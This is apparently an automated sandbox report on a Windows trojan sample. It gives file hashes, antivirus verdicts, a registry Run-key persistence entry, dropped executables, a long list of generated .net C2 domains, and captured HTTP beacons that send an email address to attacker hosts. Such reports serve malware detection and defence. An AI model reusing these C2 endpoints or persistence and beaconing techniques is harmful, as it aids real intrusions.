Analysis Date2015-10-14 13:21:13
MD57fecdc7614811410bfa8ebd4d6becc59
SHA135b8bf0f6db9196bc35646bbb73d64790fef5cdc

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 00cbd83b972c70457324e12c86115cb5 sha1: b80fa32699b95058d447ca7b29a020949332c614 size: 301056
Section.rdata md5: c5b639b1dedfdf846c857a7daca20fc6 sha1: 84bd74849ce837360e3820d3a8e2430c123172a7 size: 34816
Section.data md5: ec713b50a15bd8f3789f1ac49782872c sha1: 8af5859d1554078d3b7cbcac4ee0ec25740976b4 size: 104448
Timestamp2014-10-30 10:07:30
PackerMicrosoft Visual C++ ?.?
PEhash0caaaa8e4a22353ed90d9965ceefb3db8c4422b2
IMPhash67acfc06d4a28ff7d524ad09f7dd0096
AVRisingno_virus
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. Webno_virus
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!Trojan.Agent.Win32.581329
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Agent.Gen
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.Z
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Downloader-TLD [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterno_virus
AVAvira (antivir)BDS/Zegost.Gen4
AVMcafeeTrojan-FEMT!7FECDC761481

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PnP-X Topology Audio VC Link-Layer Filtering ➝
C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.aj
Creates FileC:\Documents and Settings\Administrator\Application Data\dbustprezf\hrclibwshct.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe"

Network Details:

DNSamountshout.net
Type: A
208.100.26.234
DNScollegestation.net
Type: A
72.52.4.91
DNSchieflisten.net
Type: A
DNScollegelisten.net
Type: A
DNSchiefdemand.net
Type: A
DNScollegedemand.net
Type: A
DNSchiefshout.net
Type: A
DNScollegeshout.net
Type: A
DNSoftenbring.net
Type: A
DNSalonebring.net
Type: A
DNSoftenlisten.net
Type: A
DNSalonelisten.net
Type: A
DNSoftendemand.net
Type: A
DNSalonedemand.net
Type: A
DNSoftenshout.net
Type: A
DNSaloneshout.net
Type: A
DNSmiddlebring.net
Type: A
DNStwelvebring.net
Type: A
DNSmiddlelisten.net
Type: A
DNStwelvelisten.net
Type: A
DNSmiddledemand.net
Type: A
DNStwelvedemand.net
Type: A
DNSmiddleshout.net
Type: A
DNStwelveshout.net
Type: A
DNSratherbring.net
Type: A
DNSmorningbring.net
Type: A
DNSratherlisten.net
Type: A
DNSmorninglisten.net
Type: A
DNSratherdemand.net
Type: A
DNSmorningdemand.net
Type: A
DNSrathershout.net
Type: A
DNSmorningshout.net
Type: A
DNSstrangebring.net
Type: A
DNShistorybring.net
Type: A
DNSstrangelisten.net
Type: A
DNShistorylisten.net
Type: A
DNSstrangedemand.net
Type: A
DNShistorydemand.net
Type: A
DNSstrangeshout.net
Type: A
DNShistoryshout.net
Type: A
DNSamountbring.net
Type: A
DNSweatherbring.net
Type: A
DNSamountlisten.net
Type: A
DNSweatherlisten.net
Type: A
DNSamountdemand.net
Type: A
DNSweatherdemand.net
Type: A
DNSweathershout.net
Type: A
DNSthickbring.net
Type: A
DNSclassbring.net
Type: A
DNSthicklisten.net
Type: A
DNSclasslisten.net
Type: A
DNSthickdemand.net
Type: A
DNSclassdemand.net
Type: A
DNSthickshout.net
Type: A
DNSclassshout.net
Type: A
DNSthinkstation.net
Type: A
DNSpresentstation.net
Type: A
DNSthinkthird.net
Type: A
DNSpresentthird.net
Type: A
DNSthinkobject.net
Type: A
DNSpresentobject.net
Type: A
DNSthinkchildhood.net
Type: A
DNSpresentchildhood.net
Type: A
DNSchiefstation.net
Type: A
DNSchiefthird.net
Type: A
DNScollegethird.net
Type: A
DNSchiefobject.net
Type: A
DNScollegeobject.net
Type: A
DNSchiefchildhood.net
Type: A
DNScollegechildhood.net
Type: A
DNSoftenstation.net
Type: A
DNSalonestation.net
Type: A
DNSoftenthird.net
Type: A
DNSalonethird.net
Type: A
DNSoftenobject.net
Type: A
DNSaloneobject.net
Type: A
DNSoftenchildhood.net
Type: A
DNSalonechildhood.net
Type: A
DNSmiddlestation.net
Type: A
DNStwelvestation.net
Type: A
DNSmiddlethird.net
Type: A
DNStwelvethird.net
Type: A
DNSmiddleobject.net
Type: A
DNStwelveobject.net
Type: A
DNSmiddlechildhood.net
Type: A
HTTP GEThttp://amountshout.net/index.php?email=stephen@qwestcom.com.au&method=post&len
User-Agent:
HTTP GEThttp://collegestation.net/index.php?email=stephen@qwestcom.com.au&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.100.26.234:80
Flows TCP192.168.1.1:1032 ➝ 72.52.4.91:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737465 7068656e 40717765   mail=stephen@qwe
0x00000020 (00032)   7374636f 6d2e636f 6d2e6175 266d6574   stcom.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 20616d6f   close..Host: amo
0x00000070 (00112)   756e7473 686f7574 2e6e6574 0d0a0d0a   untshout.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737465 7068656e 40717765   mail=stephen@qwe
0x00000020 (00032)   7374636f 6d2e636f 6d2e6175 266d6574   stcom.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 20636f6c   close..Host: col
0x00000070 (00112)   6c656765 73746174 696f6e2e 6e65740d   legestation.net.
0x00000080 (00128)   0a0d0a                                ...


Strings